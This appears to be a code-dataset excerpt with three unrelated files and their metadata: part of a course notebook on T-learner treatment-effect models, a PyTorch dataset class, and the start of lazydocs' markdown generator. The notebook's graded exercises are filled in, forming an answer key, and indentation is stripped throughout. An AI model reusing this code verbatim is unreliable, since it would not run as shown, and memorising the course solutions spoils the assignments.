plt.legend(loc='lower right')
plt.show()
emp_benefit, avg_benefit = quantile_benefit(X_test, y_test, rr_lr)
plot_empirical_risk_reduction(emp_benefit, avg_benefit, "Logistic Regression")
# If the model performed well, then you would see patients in the higher deciles of predicted risk reduction (on the right) also have higher empirical risk reduction (to the top).
#
# This model using logistic regression is far from perfect.
#
# Below, you'll see if you can do better using a more flexible machine learning approach.
# <a name="4"></a>
# ## 4 Machine Learning Approaches
# <a name="4-1"></a>
# ### 4.1 T-Learner
#
# Now you will see how recent machine learning approaches compare to the more standard analysis. The approach we'll look at is called [T-learner](https://arxiv.org/pdf/1706.03461.pdf).
# - "T" stands for "two".
# - The T-learner learns two different models, one for treatment risk, and another model for control risk.
# - Then takes the difference of the two risk predictions to predict the risk reduction.
#
# <a name='ex-09'></a>
# ### Exercise 9: Complete the TLearner class.
#
# - The constructor `__init__()` sets the treatment and control estimators based on the given inputs to the constructor.
# - The `predict` function takes the features and uses each estimator to predict the risk of death. Then it calculates the risk of death for the control estimator minus the risk of death from the treatment estimator, and returns this as the predicted risk reduction.
# In[40]:
# UNQ_C9 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
class TLearner():
"""
T-Learner class.
Attributes:
treatment_estimator (object): fitted model for treatment outcome
control_estimator (object): fitted model for control outcome
"""
def __init__(self, treatment_estimator, control_estimator):
"""
Initializer for TLearner class.
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# set the treatment estimator
self.treatment_estimator = treatment_estimator
# set the control estimator
self.control_estimator = control_estimator
### END CODE HERE ###
def predict(self, X):
"""
Return predicted risk reduction for treatment for given data matrix.
Args:
X (dataframe): dataframe containing features for each subject
Returns:
preds (np.array): predicted risk reduction for each row of X
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# predict the risk of death using the control estimator
risk_control = self.control_estimator.predict_proba(X)[:,1]
# predict the risk of death using the treatment estimator
risk_treatment = self.treatment_estimator.predict_proba(X)[:,1]
# the predicted risk reduction is control risk minus the treatment risk
pred_risk_reduction = risk_control - risk_treatment
### END CODE HERE ###
return pred_risk_reduction
# ### Tune the model with grid search
#
# In order to tune your two models, you will use grid search to find the desired parameters.
# - You will use a validation set to evaluate the model on different parameters, in order to avoid overfitting to the training set.
#
# To test models on all combinations of hyperparameters, you can first list out all of the values in a list of lists.
# For example:
# ```CPP
# hyperparams = {
# 'n_estimators': [10, 20],
# 'max_depth': [2, 5],
# 'min_samples_leaf': [0.1, 0.2],
# 'random_state': [0]
# }
# ```
# You can generate a list like this:
# ```CPP
# [[10, 20],
# [2, 5],
# [0.1, 0.2]
# ]
# ```
#
# Next, you can get all combinations of the hyperparameter values:
# ```CPP
# [(10, 2, 0.1),
# (10, 2, 0.2),
# (10, 5, 0.1),
# (10, 5, 0.2),
# (20, 2, 0.1),
# (20, 2, 0.2),
# (20, 5, 0.1),
# (20, 5, 0.2)]
# ```
#
# To feed the hyperparameters into an random forest model, you can use a dictionary, so that you do not need to hard code the parameter names.
# For example, instead of
# ```CPP
# RandomForestClassifier(n_estimators= 20, max_depth=5, min_samples_leaf=0.2)
# ```
#
# You have more flexibility if you create a dictionary and pass it into the model.
# ```CPP
# args_d = {'n_estimators': 20, 'max_depth': 5, 'min_samples_leaf': 0.2}
# RandomForestClassifier(**args_d)
# ```
# This allows you to pass in a hyperparameter dictionary for any hyperpameters, not just `n_estimators`, `max_depth`, and `min_samples_leaf`.
#
# So you'll find a way to generate a list of dictionaries, like this:
# ```CPP
# [{'n_estimators': 10, 'max_depth': 2, 'min_samples_leaf': 0.1},
# {'n_estimators': 10, 'max_depth': 2, 'min_samples_leaf': 0.2},
# {'n_estimators': 10, 'max_depth': 5, 'min_samples_leaf': 0.1},
# {'n_estimators': 10, 'max_depth': 5, 'min_samples_leaf': 0.2},
# {'n_estimators': 20, 'max_depth': 2, 'min_samples_leaf': 0.1},
# {'n_estimators': 20, 'max_depth': 2, 'min_samples_leaf': 0.2},
# {'n_estimators': 20, 'max_depth': 5, 'min_samples_leaf': 0.1},
# {'n_estimators': 20, 'max_depth': 5, 'min_samples_leaf': 0.2}]
# ```
#
# Notice how the values in both the list of tuples and list of dictionaries are in the same order as the original hyperparams dictionary. For example, the first value in each is n_estimarors, then max_depth, and then min_samples_leaf:
# ```CPP
# # list of lists
# (10, 2, 0.1)
#
# # list of dictionaries
# {'n_estimators': 10, 'max_depth': 2, 'min_samples_leaf': 0.1}
# ```
#
#
#
# Then for each dictionary of hyperparams:
# - Train a model.
# - Use the regular concordance index to compare their performances.
# - Identify and return the best performing model.
# <a name='ex-10'></a>
# ### Exercise 10: hold out grid search
#
# Implement hold out grid search.
# ##### Note
# In this case, you are not going to apply k-fold cross validation. Since `sklearn.model_selection.GridSearchCV()` applies k-fold cross validation, you won't be using this to perform grid search, and you will implement your own grid search.
#
# Please see the hints if you get stuck.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li>You can use the .items() or .values() method of a dictionary to get its key, value pairs or just values. Use a list() to store them inside a list.</li>
# <li>To get all combinations of the hyperparams, you can use itertools.product(*args_list), where args_list is a list object.</li>
# <li>To generate the list of dictionaries, loop through the list of tuples.</li>
# </ul>
# </p>
#
# In[41]:
# UNQ_C10 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def holdout_grid_search(clf, X_train_hp, y_train_hp, X_val_hp, y_val_hp, hyperparam, verbose=False):
'''
Conduct hyperparameter grid search on hold out validation set. Use holdout validation.
Hyperparameters are input as a dictionary mapping each hyperparameter name to the
range of values they should iterate over. Use the cindex function as your evaluation
function.
Input:
clf: sklearn classifier
X_train_hp (dataframe): dataframe for training set input variables
y_train_hp (dataframe): dataframe for training set targets
X_val_hp (dataframe): dataframe for validation set input variables
y_val_hp (dataframe): dataframe for validation set targets
hyperparam (dict): hyperparameter dictionary mapping hyperparameter
names to range of values for grid search
Output:
best_estimator (sklearn classifier): fitted sklearn classifier with best performance on
validation set
'''
# Initialize best estimator
best_estimator = None
# initialize best hyperparam
best_hyperparam = {}
# initialize the c-index best score to zero
best_score = 0.0
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# Get the values of the hyperparam and store them as a list of lists
hyper_param_l = list(hyperparam.values())
# Generate a list of tuples with all possible combinations of the hyperparams
combination_l_of_t = list(itertools.product(*hyper_param_l))
# Initialize the list of dictionaries for all possible combinations of hyperparams
combination_l_of_d = []
# loop through each tuple in the list of tuples
for val_tuple in combination_l_of_t: # complete this line
param_d = {}
# Enumerate each key in the original hyperparams dictionary
for i, k in enumerate(hyperparam): # complete this line
# add a key value pair to param_dict for each value in val_tuple
param_d[k] = val_tuple[i]
# append the param_dict to the list of dictionaries
combination_l_of_d.append(param_d)
# For each hyperparam dictionary in the list of dictionaries:
for param_d in combination_l_of_d: # complete this line
# Set the model to the given hyperparams
estimator = clf(**param_d)
# Train the model on the training features and labels
estimator.fit(X_train_hp,y_train_hp)
# Predict the risk of death using the validation features
preds = estimator.predict_proba(X_val_hp)
# Evaluate the model's performance using the regular concordance index
estimator_score = concordance_index(y_val_hp, preds[:,1])
# if the model's c-index is better than the previous best:
if estimator_score>best_score: # complete this line
# save the new best score
best_score = estimator_score
# same the new best estimator
best_estimator = estimator
# save the new best hyperparams
best_hyperparam = param_d
### END CODE HERE ###
if verbose:
print("hyperparam:")
display(hyperparam)
print("hyper_param_l")
display(hyper_param_l)
print("combination_l_of_t")
display(combination_l_of_t)
print(f"combination_l_of_d")
display(combination_l_of_d)
print(f"best_hyperparam")
display(best_hyperparam)
print(f"best_score: {best_score:.4f}")
return best_estimator, best_hyperparam
# In[42]:
# Test
n = X_dev.shape[0]
tmp_X_train = X_dev.iloc[:int(n*0.8),:]
tmp_X_val = X_dev.iloc[int(n*0.8):,:]
tmp_y_train = y_dev[:int(n*0.8)]
tmp_y_val = y_dev[int(n*0.8):]
hyperparams = {
'n_estimators': [10, 20],
'max_depth': [2, 5],
'min_samples_leaf': [0.1, 0.2],
'random_state' : [0]
}
from sklearn.ensemble import RandomForestClassifier
control_model = holdout_grid_search(RandomForestClassifier,
tmp_X_train, tmp_y_train,
tmp_X_val, tmp_y_val, hyperparams, verbose=True)
# T-Learner is a convenient framework because it does not restrict your choice of base learners.
# - You will use random forests as the base learners, but are able to choose another model as well.
# ##### Expected output
#
# ```CPP
# hyperparam:
# {'n_estimators': [10, 20],
# 'max_depth': [2, 5],
# 'min_samples_leaf': [0.1, 0.2],
# 'random_state': [0]}
# hyper_param_l
# [[10, 20], [2, 5], [0.1, 0.2], [0]]
# combination_l_of_t
# [(10, 2, 0.1, 0),
# (10, 2, 0.2, 0),
# (10, 5, 0.1, 0),
# (10, 5, 0.2, 0),
# (20, 2, 0.1, 0),
# (20, 2, 0.2, 0),
# (20, 5, 0.1, 0),
# (20, 5, 0.2, 0)]
# combination_l_of_d
# [{'n_estimators': 10,
# 'max_depth': 2,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 10,
# 'max_depth': 2,
# 'min_samples_leaf': 0.2,
# 'random_state': 0},
# {'n_estimators': 10,
# 'max_depth': 5,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 10,
# 'max_depth': 5,
# 'min_samples_leaf': 0.2,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 2,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 2,
# 'min_samples_leaf': 0.2,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 5,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 5,
# 'min_samples_leaf': 0.2,
# 'random_state': 0}]
# best_hyperparam
# {'n_estimators': 10,
# 'max_depth': 2,
# 'min_samples_leaf': 0.1,
# 'random_state': 0}
# best_score: 0.5928
# ```
# <a name='ex-11'></a>
# ### Exercise 11: Training and validation, treatment and control splits
#
# - Unlike logistic regression, the machine learning algorithms used for base learners will generally require hyperparameter tuning, which means that you need to split your dev set into a training and validation set.
# - You need to also split each of the training and validation sets into *treatment* and *control* groups to train the treatment and control base learners of the T-Learner.
#
# The function below takes in a dev dataset and splits it into training and validation sets for treatment and control models, respectively.
# Complete the implementation.
#
# #### Note
# - The input X_train and X_val have the 'TRTMT' column. Please remove the 'TRTMT' column from the treatment and control features that the function returns.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li> To drop a column, set the axis to 1 when calling pandas.DataFrame.drop(...). Axis=0 is used to drop a row by its index label)</li>
# </ul>
# </p>
# In[43]:
# UNQ_C11 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def treatment_dataset_split(X_train, y_train, X_val, y_val):
"""
Separate treated and control individuals in training
and testing sets. Remember that returned
datasets should NOT contain the 'TRMT' column!
Args:
X_train (dataframe): dataframe for subject in training set
y_train (np.array): outcomes for each individual in X_train
X_val (dataframe): dataframe for subjects in validation set
y_val (np.array): outcomes for each individual in X_val
Returns:
X_treat_train (df): training set for treated subjects
y_treat_train (np.array): labels for X_treat_train
X_treat_val (df): validation set for treated subjects
y_treat_val (np.array): labels for X_treat_val
X_control_train (df): training set for control subjects
y_control_train (np.array): labels for X_control_train
X_control_val (np.array): validation set for control subjects
y_control_val (np.array): labels for X_control_val
"""
### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
# From the training set, get features of patients who received treatment
X_treat_train = X_train[X_train.TRTMT==True]
# drop the 'TRTMT' column
X_treat_train = X_treat_train.drop(columns='TRTMT')
# From the training set, get the labels of patients who received treatment
y_treat_train = y_train[X_train.TRTMT==1]
# From the validation set, get the features of patients who received treatment
X_treat_val = X_val[X_val.TRTMT==True]
# Drop the 'TRTMT' column
X_treat_val = X_treat_val.drop(columns='TRTMT')
# From the validation set, get the labels of patients who received treatment
y_treat_val = y_val[X_val.TRTMT==1]
# --------------------------------------------------------------------------------------------
# From the training set, get the features of patients who did not received treatment
X_control_train = X_train[X_train.TRTMT==False]
# Drop the TRTMT column
X_control_train = X_control_train.drop(columns='TRTMT')
# From the training set, get the labels of patients who did not receive treatment
y_control_train = y_train[X_train.TRTMT==False]
# From the validation set, get the features of patients who did not receive treatment
X_control_val = X_val[X_val.TRTMT==False]
# drop the 'TRTMT' column
X_control_val = X_control_val.drop(columns='TRTMT')
# From the validation set, get teh labels of patients who did not receive treatment
y_control_val = y_val[X_val.TRTMT==False]
### END CODE HERE ###
return (X_treat_train, y_treat_train,
X_treat_val, y_treat_val,
X_control_train, y_control_train,
X_control_val, y_control_val)
# **Test Case**
# In[44]:
# Tests
example_df = pd.DataFrame(columns = ['ID', 'TRTMT'])
example_df.ID = range(100)
example_df.TRTMT = np.random.binomial(n=1, p=0.5, size=100)
treated_ids = set(example_df[example_df.TRTMT==1].ID)
example_y = example_df.TRTMT.values
example_train, example_val, example_y_train, example_y_val = train_test_split(
example_df, example_y, test_size = 0.25, random_state=0
)
(x_treat_train, y_treat_train,
x_treat_val, y_treat_val,
x_control_train, y_control_train,
x_control_val, y_control_val) = treatment_dataset_split(example_train, example_y_train,
example_val, example_y_val)
print("Tests")
pass_flag = True
pass_flag = (len(x_treat_train) + len(x_treat_val) + len(x_control_train) +
len(x_control_val) == 100)
print(f"\nDidn't lose any subjects: {pass_flag}")
pass_flag = (("TRTMT" not in x_treat_train) and ("TRTMT" not in x_treat_val) and
("TRTMT" not in x_control_train) and ("TRTMT" not in x_control_val))
print(f"\nTRTMT not in any splits: {pass_flag}")
split_treated_ids = set(x_treat_train.ID).union(set(x_treat_val.ID))
pass_flag = (len(split_treated_ids.union(treated_ids)) == len(treated_ids))
print(f"\nTreated splits have all treated patients: {pass_flag}")
split_control_ids = set(x_control_train.ID).union(set(x_control_val.ID))
pass_flag = (len(split_control_ids.intersection(treated_ids)) == 0)
print(f"\nAll subjects in control split are untreated: {pass_flag}")
pass_flag = (len(set(x_treat_train.ID).intersection(x_treat_val.ID)) == 0)
print(f"\nNo overlap between treat_train and treat_val: {pass_flag}")
pass_flag = (len(set(x_control_train.ID).intersection(x_control_val.ID)) == 0)
print(f"\nNo overlap between control_train and control_val: {pass_flag}")
print(f"\n--> Expected: All statements should be True")
# You will now train a T-learner model on the patient data, and evaluate its performance using the c-for-benefit.
#
# First, get the training and validation sets.
# In[45]:
# Import the random forest classifier to be used as the base learner
from sklearn.ensemble import RandomForestClassifier
# Split the dev data into train and validation sets
X_train, X_val, y_train, y_val = train_test_split(X_dev,
y_dev,
test_size = 0.25,
random_state = 0)
# Split the training set into a treatment and control set.
# Similarly, split the validation set into a treatment and control set.
# In[46]:
# get treatment and control arms of training and validation sets
(X_treat_train, y_treat_train,
X_treat_val, y_treat_val,
X_control_train, y_control_train,
X_control_val, y_control_val) = treatment_dataset_split(X_train, y_train,
X_val, y_val)
# Choose a set of hyperparameters to perform grid search and find the best model.
# - Please first use these given hyperparameters so that you can get the same c-for-benefit calculation at the end of this exercise.
# - Afterwards, we encourage you to come back and try other ranges for these hyperparameters.
#
# ```CPP
# # Given hyperparams to do grid search
# hyperparams = {
# 'n_estimators': [100, 200],
# 'max_depth': [2, 5, 10, 40, None],
# 'min_samples_leaf': [1, 0.1, 0.2],
# 'random_state': [0]
# }
# ```
# In[47]:
# hyperparameter grid (we'll use the same one for both arms for convenience)
# Note that we set random_state to zero
# in order to make the output consistent each time it's run.
hyperparams = {
'n_estimators': [100, 200],
'max_depth': [2, 5, 10, 40, None],
'min_samples_leaf': [1, 0.1, 0.2],
'random_state': [0]
}
# Train the treatment base learner.
# - Perform grid search to find a random forest classifier and associated hyperparameters with the best c-index (the regular c-index).
# In[48]:
# perform grid search with the treatment data to find the best model
treatment_model, best_hyperparam_treat = holdout_grid_search(RandomForestClassifier,
X_treat_train, y_treat_train,
X_treat_val, y_treat_val, hyperparams)
# Train the control base learner.
# In[49]:
# perform grid search with the control data to find the best model
control_model, best_hyperparam_ctrl = holdout_grid_search(RandomForestClassifier,
X_control_train, y_control_train,
X_control_val, y_control_val, hyperparams)
# Combine the treatment and control base learners into the T-learner.
# In[50]:
# Save the treatment and control models into an instance of the TLearner class
t_learner = TLearner(treatment_model, control_model)
# For the validation set, predict each patient's risk reduction.
# In[51]:
# Use the t-learner to predict the risk reduction for patients in the validation set
rr_t_val = t_learner.predict(X_val.drop(['TRTMT'], axis=1))
print(f"X_val num of patients {X_val.shape[0]}")
print(f"rr_t_val num of patient predictions {rr_t_val.shape[0]}")
# Now plot a histogram of your predicted risk reduction on the validation set.
# In[55]:
plt.hist(rr_t_val, bins='auto')
plt.title("Histogram of Predicted ARR, T-Learner, validation set")
plt.xlabel('predicted risk reduction')
plt.ylabel('count of patients')
plt.show()
# Notice when viewing the histogram that predicted risk reduction can be negative.
# - This means that for some patients, the T-learner predicts that treatment will actually increase their risk (negative risk reduction).
# - The T-learner is more flexible compared to the logistic regression model, which only predicts non-negative risk reduction for all patients (view the earlier histogram of the 'predicted ARR' histogram for the logistic regression model, and you'll see that the possible values are all non-negative).
# Now plot an empirical risk reduction plot for the validation set examples.
# In[56]:
empirical_benefit, avg_benefit = quantile_benefit(X_val, y_val, rr_t_val)
plot_empirical_risk_reduction(empirical_benefit, avg_benefit, 'T Learner [val set]')
# Recall that the predicted risk reduction is along the horizontal axis and the vertical axis is the empirical (actual risk reduction).
#
# A good model would predict a lower risk reduction for patients with actual lower risk reduction. Similarly, a good model would predict a higher risk reduction for patients with actual higher risk reduction (imagine a diagonal line going from the bottom left to the top right of the plot).
#
# The T-learner seems to be doing a bit better (compared to the logistic regression model) at differentiating between the people who would benefit most treatment and the people who would benefit least from treatment.
# Compute the C-statistic-for-benefit on the validation set.
# In[54]:
c_for_benefit_tlearner_val_set = c_statistic(rr_t_val, y_val, X_val.TRTMT)
print(f"C-for-benefit statistic of T-learner on val set: {c_for_benefit_tlearner_val_set:.4f}")
# ##### Expected output
#
# ```CPP
# C-for-benefit statistic of T-learner on val set: 0.5043
# ```
# Now or the test set, predict each patient's risk reduction
# In[57]:
# predict the risk reduction for each of the patients in the test set
rr_t_test = t_learner.predict(X_test.drop(['TRTMT'], axis=1))
# Plot the histogram of risk reduction for the test set.
# In[58]:
# Plot a histogram of the predicted risk reduction
plt.hist(rr_t_test, bins='auto')
plt.title("Histogram of Predicted ARR for the T-learner on test set")
plt.xlabel("predicted risk reduction")
plt.ylabel("count of patients")
plt.show()
# Plot the predicted versus empircal risk reduction for the test set.
# In[59]:
# Plot the predicted versus empirical risk reduction for the test set
empirical_benefit, avg_benefit = quantile_benefit(X_test, y_test, rr_t_test)
plot_empirical_risk_reduction(empirical_benefit, avg_benefit, 'T Learner (test set)')
# Evaluate the T-learner's performance using the test set.
# In[60]:
# calculate the c-for-benefit of the t-learner on the test set
c_for_benefit_tlearner_test_set = c_statistic(rr_t_test, y_test, X_test.TRTMT)
print(f"C-for-benefit statistic on test set: {c_for_benefit_tlearner_test_set:.4f}")
# ##### Expected output
#
# ```CPP
# C-for-benefit statistic on test set: 0.5250
# ```
# The c-for-benefit of the two models were evaluated on different test sets. However, we can compare their c-for-benefit scores to get a sense of how they perform:
# - logistic regression: 0.5412
# - T-learner: 0.5250
#
# The T-learner doesn't actually do better than the logistic regression in this case. You can try to tune the hyperparameters of the T-Learner to see if you can improve it.
#
# ### Note
# While the more flexible ML techniques may improve predictive power, the sample size is too small to be certain.
# - Models like the T-learner could still be helpful in identifying subgroups who will likely not be helped by treatment, or could even be harmed by treatment.
# - So doctors can study these patients in more detail to find out how to improve their outcomes.
# ## Congratulations
#
# You've finished the assignment for Course 3 Module 1! We've seen that machine learning techniques can help determine when a treatment will have greater treatment effect for a particular patient.
| 38.256555
| 619
| 0.680213
|
4a15b0d50d31512dc79017bfc6b260abbd303fc9
| 1,137
|
py
|
Python
|
loaders/chimera_dataset.py
|
Neural-Diffusion-Research/normalized-autoencoders
|
0c77f7e29289e336c0fe5e941aaec8baa4a4fb82
|
[
"MIT"
] | 30
|
2021-06-23T10:46:45.000Z
|
2022-03-13T04:00:58.000Z
|
loaders/chimera_dataset.py
|
Neural-Diffusion-Research/normalized-autoencoders
|
0c77f7e29289e336c0fe5e941aaec8baa4a4fb82
|
[
"MIT"
] | 12
|
2021-06-30T01:27:25.000Z
|
2022-02-10T02:59:42.000Z
|
loaders/chimera_dataset.py
|
Neural-Diffusion-Research/normalized-autoencoders
|
0c77f7e29289e336c0fe5e941aaec8baa4a4fb82
|
[
"MIT"
] | 10
|
2021-06-24T23:29:46.000Z
|
2022-02-04T09:56:09.000Z
|
from torch.utils.data import Dataset
class Chimera(Dataset):
def __init__(self, ds, mode='horizontal'):
self.ds = ds
self.mode = mode
def __len__(self):
return len(self.ds)
def __getitem__(self, i):
img, lbl = self.ds[i]
if self.mode == 'horizontal':
half = (img.shape[2]) // 2
img2, lbl2 = self.select_diff_digit(lbl, i)
img[:, :half, :] = img2[:, :half, :]
img[:, half-3:half+3, :] = 0
return img, str(f'{lbl},{lbl2}')
elif self.mode == 'horizontal_blank':
half = (img.shape[2]) // 2
if i % 2 == 0:
img[:, :half, :] = 0.
else:
img[:, half:, :] = 0.
return img, lbl
else:
raise ValueError
def select_diff_digit(self, digit, i):
new_digit = digit
idx = i
while new_digit == digit:
idx += 1
idx = idx % len(self.ds)
# idx = np.random.randint(len(self.ds))
img , lbl = self.ds[idx]
new_digit = lbl
return img, lbl
| 25.840909
| 55
| 0.46438
|
4a15b128e5ed46a0f00af70a13faacb6cb09b3fd
| 37,855
|
py
|
Python
|
src/lazydocs/generation.py
|
koaleksa/lazydocs
|
ebf6ea85601f4c630e788c66eab1cb6d0b7a3331
|
[
"MIT"
] | null | null | null |
src/lazydocs/generation.py
|
koaleksa/lazydocs
|
ebf6ea85601f4c630e788c66eab1cb6d0b7a3331
|
[
"MIT"
] | null | null | null |
src/lazydocs/generation.py
|
koaleksa/lazydocs
|
ebf6ea85601f4c630e788c66eab1cb6d0b7a3331
|
[
"MIT"
] | null | null | null |
"""Main module for markdown generation."""
import datetime
import importlib
import importlib.util
import inspect
import os
import pkgutil
import re
import subprocess
import types
from pydoc import locate
from typing import Any, Callable, Dict, List, Optional
_RE_BLOCKSTART_LIST = re.compile(
r"(Args:|Arg:|Arguments:|Parameters:|Kwargs:|Attributes:|Returns:|Yields:|Kwargs:|Raises:).{0,2}$",
re.IGNORECASE,
)
_RE_BLOCKSTART_TEXT = re.compile(r"(Examples:|Example:|Todo:).{0,2}$", re.IGNORECASE)
_RE_QUOTE_TEXT = re.compile(r"(Notes:|Note:).{0,2}$", re.IGNORECASE)
_RE_TYPED_ARGSTART = re.compile(r"([\w\[\]_]{1,}?)\s*?\((.*?)\):(.{2,})", re.IGNORECASE)
_RE_ARGSTART = re.compile(r"(.{1,}?):(.{2,})", re.IGNORECASE)
_IGNORE_GENERATION_INSTRUCTION = "lazydocs: ignore"
# String templates
_SOURCE_BADGE_TEMPLATE = """
<a href="{path}"><img align="right" style="float:right;" src="https://img.shields.io/badge/-source-cccccc?style=flat-square"></a>
"""
_SEPARATOR = """
---
"""
_FUNC_TEMPLATE = """
{section} <kbd>{func_type}</kbd> `{header}`
```python
{funcdef}
```
{doc}
"""
_CLASS_TEMPLATE = """
{section} <kbd>class</kbd> `{header}`
{doc}
{init}
{variables}
{handlers}
{methods}
"""
_MODULE_TEMPLATE = """
{section} <kbd>module</kbd> `{header}`
{doc}
{global_vars}
{functions}
{classes}
"""
_OVERVIEW_TEMPLATE = """
# API Overview
## Modules
{modules}
## Classes
{classes}
## Functions
{functions}
"""
_WATERMARK_TEMPLATE = """
---
_This file was automatically generated via [lazydocs](https://github.com/ml-tooling/lazydocs)._
"""
_MKDOCS_PAGES_TEMPLATE = """title: API Reference
nav:
- Overview: {overview_file}
- ...
"""
def _get_function_signature(
function: Callable,
owner_class: Any = None,
show_module: bool = False,
ignore_self: bool = False,
wrap_arguments: bool = False,
remove_package: bool = False,
) -> str:
"""Generates a string for a function signature.
Args:
function: Selected function (or method) to generate the signature string.
owner_class: Owner class of this function.
show_module: If `True`, add module path in function signature.
ignore_self: If `True`, ignore self argument in function signature.
wrap_arguments: If `True`, wrap all arguments to new lines.
remove_package: If `True`, the package path will be removed from the function signature.
Returns:
str: Signature of selected function.
"""
isclass = inspect.isclass(function)
# Get base name.
name_parts = []
if show_module:
name_parts.append(function.__module__)
if owner_class:
name_parts.append(owner_class.__name__)
if hasattr(function, "__name__"):
name_parts.append(function.__name__)
else:
name_parts.append(type(function).__name__)
name_parts.append("__call__")
function = function.__call__ # type: ignore
name = ".".join(name_parts)
if isclass:
function = getattr(function, "__init__", None)
arguments = []
return_type = ""
if hasattr(inspect, "signature"):
parameters = inspect.signature(function).parameters
if inspect.signature(function).return_annotation != inspect.Signature.empty:
return_type = str(inspect.signature(function).return_annotation)
if return_type.startswith("<class"):
# Base class -> get real name
try:
return_type = inspect.signature(function).return_annotation.__name__
except Exception:
pass
# Remove all typing path prefixes
return_type = return_type.replace("typing.", "")
if remove_package:
# Remove all package path return type
return_type = re.sub(r"([a-zA-Z0-9_]*?\.)", "", return_type)
for parameter in parameters:
argument = str(parameters[parameter])
if ignore_self and argument == "self":
# Ignore self
continue
# Reintroduce Optionals
argument = re.sub(r"Union\[(.*?), NoneType\]", r"Optional[\1]", argument)
# Remove package
if remove_package:
# Remove all package path from parameter signature
if "=" not in argument:
argument = re.sub(r"([a-zA-Z0-9_]*?\.)", "", argument)
else:
# Remove only from part before the first =
argument_split = argument.split("=")
argument_split[0] = re.sub(
r"([a-zA-Z0-9_]*?\.)", "", argument_split[0]
)
argument = "=".join(argument_split)
arguments.append(argument)
else:
print("Seems like function " + name + " does not have any signature")
signature = name + "("
if wrap_arguments:
for i, arg in enumerate(arguments):
signature += "\n " + arg
signature += "," if i is not len(arguments) - 1 else "\n"
else:
signature += ", ".join(arguments)
signature += ")" + ((" → " + return_type) if return_type else "")
return signature
def _order_by_line_nos(objs: Any, line_nos: List[int]) -> List[str]:
"""Orders the set of `objs` by `line_nos`."""
ordering = sorted(range(len(line_nos)), key=line_nos.__getitem__)
return [objs[i] for i in ordering]
def to_md_file(
markdown_str: str,
filename: str,
out_path: str = ".",
watermark: bool = True,
disable_markdownlint: bool = True,
) -> None:
"""Creates an API docs file from a provided text.
Args:
markdown_str (str): Markdown string with line breaks to write to file.
filename (str): Filename without the .md
watermark (bool): If `True`, add a watermark with a timestamp to bottom of the markdown files.
disable_markdownlint (bool): If `True`, an inline tag is added to disable markdownlint for this file.
out_path (str): The output directory
"""
if not markdown_str:
# Dont write empty files
return
md_file = filename
if not filename.endswith(".md"):
md_file = filename + ".md"
if disable_markdownlint:
markdown_str = "<!-- markdownlint-disable -->\n" + markdown_str
if watermark:
markdown_str += _WATERMARK_TEMPLATE.format(
date=datetime.date.today().strftime("%d %b %Y")
)
print("Writing {}.".format(md_file))
with open(os.path.join(out_path, md_file), "w") as f:
f.write(markdown_str)
def _code_snippet(snippet: str) -> str:
"""Generates a markdown code snippet based on python code.
Args:
snippet (str): Python code.
Returns:
str: Markdown code snippet.
"""
result = "```python\n"
result += snippet + "\n"
result += "```\n\n"
return result
def _get_line_no(obj: Any) -> Optional[int]:
"""Gets the source line number of this object. None if `obj` code cannot be found."""
try:
return inspect.getsourcelines(obj)[1]
except Exception:
# no code found
return None
def _get_class_that_defined_method(meth: Any) -> Any:
if inspect.ismethod(meth):
for cls in inspect.getmro(meth.__self__.__class__):
if cls.__dict__.get(meth.__name__) is meth:
return cls
meth = meth.__func__ # fallback to __qualname__ parsing
if inspect.isfunction(meth):
mod = inspect.getmodule(meth)
if mod is None:
return None
cls = getattr(
inspect.getmodule(meth),
meth.__qualname__.split(".<locals>", 1)[0].rsplit(".", 1)[0],
)
if isinstance(cls, type):
return cls
return getattr(meth, "__objclass__", None) # handle special descriptor objects
def _get_docstring(obj: Any) -> str:
return "" if obj.__doc__ is None else inspect.getdoc(obj) or ""
def _is_object_ignored(obj: Any) -> bool:
if (
_IGNORE_GENERATION_INSTRUCTION.replace(" ", "").lower()
in _get_docstring(obj).replace(" ", "").lower()
):
# Do not generate anything if docstring contains ignore instruction
return True
return False
def _is_module_ignored(module_name: str, ignored_modules: List[str]) -> bool:
"""Checks if a given module is ignored."""
if module_name.split(".")[-1].startswith("_"):
return True
for ignored_module in ignored_modules:
if module_name == ignored_module:
return True
# Check is module is subpackage of an ignored package
if module_name.startswith(ignored_module + "."):
return True
return False
def _get_src_root_path(obj: Any) -> str:
"""Get the root path to a imported module.
Args:
obj (Any): Imported python object.
Returns:
str: Full source root path to the selected object.
"""
module = obj
if not isinstance(obj, types.ModuleType):
module = inspect.getmodule(obj)
root_package = module.__name__.split(".")[0]
return module.__file__.split(root_package)[0] + root_package
def _get_doc_summary(obj: Any) -> str:
# First line should contain the summary
return _get_docstring(obj).split("\n")[0]
def _get_anchor_tag(header: str) -> str:
anchor_tag = header.strip().lower()
# Whitespaces to -
anchor_tag = re.compile(r"\s").sub("-", anchor_tag)
# Remove not allowed characters
anchor_tag = re.compile(r"[^a-zA-Z0-9-_]").sub("", anchor_tag)
return anchor_tag
def _doc2md(obj: Any) -> str:
"""Parse docstring (with getdoc) according to Google-style formatting and convert to markdown.
Args:
obj: Selected object for markdown generation.
Returns:
str: Markdown documentation for docstring of selected object.
"""
# TODO Evaluate to use: https://github.com/rr-/docstring_parser
# The specfication of Inspect#getdoc() was changed since version 3.5,
# the documentation strings are now inherited if not overridden.
# For details see: https://docs.python.org/3.6/library/inspect.html#inspect.getdoc
# doc = getdoc(func) or ""
doc = _get_docstring(obj)
blockindent = 0
argindent = 1
out = []
arg_list = False
literal_block = False
md_code_snippet = False
quote_block = False
